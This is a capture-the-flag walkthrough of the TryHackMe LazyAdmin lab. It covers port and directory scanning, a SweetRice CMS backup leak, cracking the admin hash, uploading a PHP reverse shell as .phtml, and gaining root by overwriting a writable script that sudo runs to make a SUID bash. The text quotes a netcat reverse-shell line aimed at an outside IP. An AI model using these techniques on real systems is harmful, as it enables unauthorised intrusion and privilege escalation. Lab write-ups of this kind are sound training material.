Challenge Link: https://tryhackme.com/room/lazyadmin
As usual I started the initial enumeration by running a port scan using nmap, looking for open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin] └─$ nmap -sC -sV -oN nmap/initial 10.10.93.93 Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-02 15:50 IST Nmap scan report for 10.10.93.93 Host is up (0.17s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA) | 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA) |_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds
We have only two ports open. There is SSH running on port 22 and Apache web server running on port 80. Let's start the enumeration with port 80 first.
The website shows only the default Apache 2 page. Next I ran a dirb scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin] └─$ dirb http://10.10.93.93 ----------------- DIRB v2.22 By The Dark Raver ----------------- URL_BASE: http://10.10.93.93/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.93.93/ ---- ==> DIRECTORY: http://10.10.93.93/content/ + http://10.10.93.93/index.html (CODE:200|SIZE:11321) + http://10.10.93.93/server-status (CODE:403|SIZE:276) ---- Entering directory: http://10.10.93.93/content/ ---- ==> DIRECTORY: http://10.10.93.93/content/_themes/ ==> DIRECTORY: http://10.10.93.93/content/as/ ==> DIRECTORY: http://10.10.93.93/content/attachment/ ==> DIRECTORY: http://10.10.93.93/content/images/ ==> DIRECTORY: http://10.10.93.93/content/inc/ + http://10.10.93.93/content/index.php (CODE:200|SIZE:2197) ==> DIRECTORY: http://10.10.93.93/content/js/
We have a directory named /content. When we visit the directory, we see a landing page which says that the website is still under construction.
Also we see a line in the footer of the web page which says powered by Basic-CMS.ORG Sweet Rice. This might be the name of the CMS.
We also have a directory named /as where we can login into the CMS but we need a valid username and password for it. I tried guessing some common username and passwords but none of them worked.
Next I searched for 'basiccms.org sweet rice', but instead of getting the website or documentation, I found a few exploitDB links in the top results XD. I looked through all the exploits and the one which I found interesting was an information disclosure exploit.
According to the exploit, we can simply visit the /inc/mysql_backup/ directory to get a MySQL backup.
I downloaded the backup file and opened it in a text editor. Inside the backup file, I found the password hash for the user manager.
We can crack this hash using hydra or some online password cracking website such as crackstation.net.
This was a very easy password. Now we can login into SweetRice CMS using the credentials we've found into /as directory that we found earlier.
After logging in, I found an option named Media Center where we can upload our own files. We can upload our php shell here and execute it in order to get a reverse shell back to our system.
But we cannot simply upload our reverse shell there because the upload functionality does not accept
But we can upload the reverse shell by using some other extensions such as
.phtml. Once the upload is complete we can run it from the
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin] └─$ nc -lvnp 9001 listening on [any] 9001 ... connection received from (UNKNOWN) [10.10.93.93] 37266 Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux 15:03:30 up 2:50, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@THM-Chal:/$
Next I upgraded the dumb shell into a fully interactive TTY using the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")' Ctrl-Z stty raw -echo && fg reset export TERM=xterm stty rows 48 columns 179
Next I checked the /home directory and there was a user named
itguy. Inside the home directory of user
itguy we can read our user flag.
www-data@THM-Chal:/$ ls -lah /home total 12K drwxr-xr-x 3 root root 4.0K Nov 29 2019 . drwxr-xr-x 23 root root 4.0K Nov 29 2019 .. drwxr-xr-x 18 itguy itguy 4.0K Nov 30 2019 itguy www-data@THM-Chal:/$ cd home/itguy/ www-data@THM-Chal:/home/itguy$ wc -c user.txt 38 user.txt
Next I ran the
sudo -l command to check if we run can any command as user root and found that user
www-data can run a perl script present the home directory of user
itguy as root.
www-data@THM-Chal:/home/itguy$ sudo -l Matching Defaults entries for www-data on THM-Chal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
Next when I checked the contents of
/home/itguy/backup.pl, I found that it was executing another file
www-data@THM-Chal:/home/itguy$ cat backup.pl #!/usr/bin/perl system("sh", "/etc/copy.sh");
Now I checked the contents of
/etc/copy.sh and found a code to get a reverse shell inside it XD.
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
Next, I checked the permissions of this file and found that we have the permissions to write this file. So instead of getting a reverse shell, I copied the
/bin/bash to the
/tmp directory and made it a SUID to get the root shell.
www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh -rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh www-data@THM-Chal:/home/itguy$ echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" > /etc/copy.sh
Now if we execute the
backup.pl, it will create a binary named bash in the
/tmp directory. Then we can execute the binary to get the root shell.
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl www-data@THM-Chal:/home/itguy$ cd /tmp www-data@THM-Chal:/tmp$ ./bash -p bash-4.3# id uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Hurray! We're now root and now we can read our final flag present in the
bash-4.3# cd /root bash-4.3# ls root.txt bash-4.3# wc -c root.txt 38 root.txt
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alfrey Davilla.